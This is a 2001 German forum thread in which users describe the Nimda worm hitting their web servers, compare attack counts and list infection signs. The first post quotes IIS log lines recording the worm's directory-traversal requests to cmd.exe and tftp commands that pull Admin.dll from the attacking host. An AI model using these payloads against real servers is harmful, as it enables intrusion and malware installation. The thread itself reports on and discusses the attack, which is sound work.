F***king Nimba

Seite 1 von 3 - Forum: Windows auf overclockers.at

URL: https://www.overclockers.at/windows/fking_nimba_14232/page_1 - zur Vollversion wechseln!

The Red Guy schrieb am 19.09.2001 um 14:19

Der Virus hat sich ja wieder toll im Chello-Netz verbreitet.

Die Logfiles vom Firmenwebserver gehen schon über mit solchen requests:

2001-09-19 00:03:58 212.17.35.8 - W3SVC1 DEFIANT 100.0.0.1 80 GET /scripts/root.exe /c+dir 404 HTTP/1.0 www -
2001-09-19 00:03:58 212.17.35.8 - W3SVC1 DEFIANT 100.0.0.1 80 GET /MSADC/root.exe /c+dir 403 HTTP/1.0 www -
2001-09-19 00:03:58 212.17.35.8 - W3SVC1 DEFIANT 100.0.0.1 80 GET /c/winnt/system32/cmd.exe /c+dir 404 HTTP/1.0 www -
2001-09-19 00:03:59 212.17.35.8 - W3SVC1 DEFIANT 100.0.0.1 80 GET /d/winnt/system32/cmd.exe /c+dir 404 HTTP/1.0 www -
2001-09-19 00:04:00 212.17.35.8 - W3SVC1 DEFIANT 100.0.0.1 80 GET /scripts/..%5c../winnt/system32/cmd.exe /c+dir 200 HTTP/1.0 www -
2001-09-19 00:04:03 212.17.35.8 - W3SVC1 DEFIANT 100.0.0.1 80 GET /scripts/..%5c../winnt/system32/cmd.exe /c+tftp%20-i%20212.17.35.8%20GET%20Admin.dll%20c:\Admin.dll 502 HTTP/1.0 www -
2001-09-19 00:04:03 212.17.35.8 - W3SVC1 DEFIANT 100.0.0.1 80 GET /scripts/..%5c../winnt/system32/cmd.exe /c+tftp%20-i%20212.17.35.8%20GET%20Admin.dll%20d:\Admin.dll 502 HTTP/1.0 www -
2001-09-19 00:04:06 212.17.35.8 - W3SVC1 DEFIANT 100.0.0.1 80 GET /scripts/..%5c../winnt/system32/cmd.exe /c+tftp%20-i%20212.17.35.8%20GET%20Admin.dll%20e:\Admin.dll 502 HTTP/1.0 www -
2001-09-19 00:04:06 212.17.35.8 - W3SVC1 DEFIANT 100.0.0.1 80 GET /scripts/..%5c../Admin.dll - 500 HTTP/1.0 www -
2001-09-19 00:04:06 212.17.35.8 - W3SVC1 DEFIANT 100.0.0.1 80 GET /_vti_bin/..%5c../..%5c../..%5c../winnt/system32/cmd.exe /c+dir 200 HTTP/1.0 www -
2001-09-19 00:04:06 212.17.35.8 - W3SVC1 DEFIANT 100.0.0.1 80 GET /_vti_bin/..%5c../..%5c../..%5c../winnt/system32/cmd.exe /c+tftp%20-i%20212.17.35.8%20GET%20Admin.dll%20c:\Admin.dll 502 HTTP/1.0 www -


Macht schon nimma Spass. :(

Surfen ist heute ein einziges Warten. Alles wie tot.

Langsam sollte man sich echt was wegen den selbstreplizierenden Viren überlegen.

noledge schrieb am 19.09.2001 um 14:40

ich hab auf meiner linux-kiste mindestens 30 zugriffe / minute

der is ja viel ärger als code red

noledge

Redphex schrieb am 19.09.2001 um 14:44

hmm .. mal wieder den apache aufdrehn und schaun was da bei mir so geht ..

HaBa schrieb am 19.09.2001 um 14:51

Interessant, entweder ist meine Firewall im Popsch oder .....

Keinen einzigen Angriff gibts bis jetzt zu verzeichnen.

noledge schrieb am 19.09.2001 um 14:57

is blöde is das de angriffe nix gleiches in der url haben, da kammas ned gscheid zählen :(

noledge

Ctrl-Alt-Del schrieb am 19.09.2001 um 15:00

In wie weit müsste ich das Teil bemerken?
Bei uns in der Firma ist nix los... kein Virus/Wurm weit und breit.

Hmmm langweilig! :D

The Red Guy schrieb am 19.09.2001 um 15:01

@haba: wenn deine Firewall den Port 80 offen hat, wirst nichts merken, weil die Requests sind ja im Prinzip ganz normale Zugriffe auf den Webserver wie schon beim Code Red.

@noledge: grep mal nach admin.dll und cmd.exe und addiere sie.

The Red Guy schrieb am 19.09.2001 um 15:04

Zitat von Ctrl-Alt-Del
In wie weit müsste ich das Teil bemerken?
Bei uns in der Firma ist nix los... kein Virus/Wurm weit und breit.

Hmmm langweilig! :D


In den Root-Verzeichnissen deiner Partitions befindet sich auf einmal die admin.dll. du hast extrem hohen traffic im netz. Mails werden verschickt mit diversen Files. Du hast plötzlich neue shares auf deinen Rechnern...

Genaue info gibts hier bei McAfee.

HaBa schrieb am 19.09.2001 um 15:05

Jetzt gehts looooos, jetzt gehts loooooos!

Naja, man muß eine Weile verbunden sein, dann kommen einige.

So ca. ein Angreifer pro Minute mit 3 bis 6 Angriffen.

Ctrl-Alt-Del schrieb am 19.09.2001 um 15:11

Zitat von The Red Guy
In den Root-Verzeichnissen deiner Partitions befindet sich auf einmal die admin.dll. du hast extrem hohen traffic im netz. Mails werden verschickt mit diversen Files. Du hast plötzlich neue shares auf deinen Rechnern...

Genaue info gibts hier bei McAfee.

Danke!
Klingt nett! :(

noledge schrieb am 19.09.2001 um 15:41

lol 5608 angriffe

code red hab ich bis jetzt 1800

noledge

noledge schrieb am 19.09.2001 um 15:43

@red guy root.exe ned vergessen...

noledge

BeatMaster schrieb am 19.09.2001 um 16:19

Na ja in Unserer Firma scheut es gar nicht gut aus *g* - Kollegen haben die Nacht durchgearbeitet - haben es aber noch immer nicht in den Griff bekommen - Niemand kann auf Unserer Server von ausserhalb zugreifen - SAP R/2, SAP R/3, Exchange,....usw...

*g*

The Red Guy schrieb am 19.09.2001 um 16:24

Der Witz dieses mal ist ja, daß du nicht unbedingt einen IIS brauchst.

Wenn du mit einem ungepatchen IE auf eine Homepage mit infizierten IIS gehst, dann kannst dir auch schon gratulieren. Und weils so lustig ist, verwendet er gleich dein Outlook auch.

Und flugs hast dus auf jedem rechner im büro.

spunz schrieb am 19.09.2001 um 17:23

tjo, alle dau´s haben wieder was gelernt. ie sux :p iis sux :p outlook sux :p



overclockers.at v4.thecommunity
© all rights reserved by overclockers.at 2000-2026